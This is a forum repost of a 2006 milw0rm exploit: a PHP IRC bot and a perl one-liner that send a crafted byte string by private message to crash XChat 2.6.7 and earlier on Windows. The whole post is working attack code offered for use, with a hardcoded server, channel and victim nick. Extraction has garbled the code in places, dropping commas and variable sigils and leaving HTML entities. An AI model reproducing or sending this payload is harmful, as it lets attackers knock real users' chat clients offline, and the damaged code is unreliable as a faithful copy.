XChat <= 2.6.7 (Windows Version) Remote Denial of Service Exploit

Started by insanity, 07 de August , 2006, 05:28:22 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

insanity

<?
 # another way to test this with irssi/bitchx <below> /str0ke
 # /exec -o perl -e 'print "\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82"'
 ?>

<?php
// XChat <= 2&#46;6&#46;7 Windows Remote Crash DoS by ratboy
// Tested on Windows SP1/SP2          
// The following bug was tested on the XChat <= 2&#46;6&#46;7 on Windows SP1/SP2  

//Stop the script timing out
set_time_limit(0);

//Set constants
define("SERVER"'irc&#46;enigmagroup&#46;org');
define("PORT"6667);
define("CHANNEL""#enigmagroup");  //Set the channel the bot will join here
define("NICK""ratbot");    //Set the bot's nick here
define("EXPLOIT""\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82");
define("VICTIM""ratboy");

$socket socket_create(AF_INET,SOCK_STREAM,SOL_TCP); // Create the Socket
$fp socket_connect($socketSERVERPORT); // Connect to the server
socket_write($socket,"USER ratboy ratboy ratboy &#58;ratboy\r\n"); // Send the Username to the server
socket_write($socket,"NICK "&#46;NICK&#46;" \r\n"); // Change our nickname
socket_write($socket,"JOIN "&#46;CHANNEL&#46;" \r\n"); // Join the channel
while($data = @socket_read($socket,2046)) { //read the data
    
echo $data;
    
$cmd explode(" "$data);

    if (
strpos($data"PING &#58;")===0) {
        
socket_write($socket"PONG &#58;"&#46;substr($data, 6)&#46;"\r\n");
        
continue;
    }
    
    if(
$cmd[1&#93; == "PRIVMSG"){  // Send the exploit right when the channel gets a message then stop the bot
        
socket_write($socket"PRIVMSG "&#46;VICTIM&#46;" &#58;"&#46;EXPLOIT&#46;"\r\n");
        
socket_close($socket);
    }
}

?>


# milw0rm.com [2006-08-07]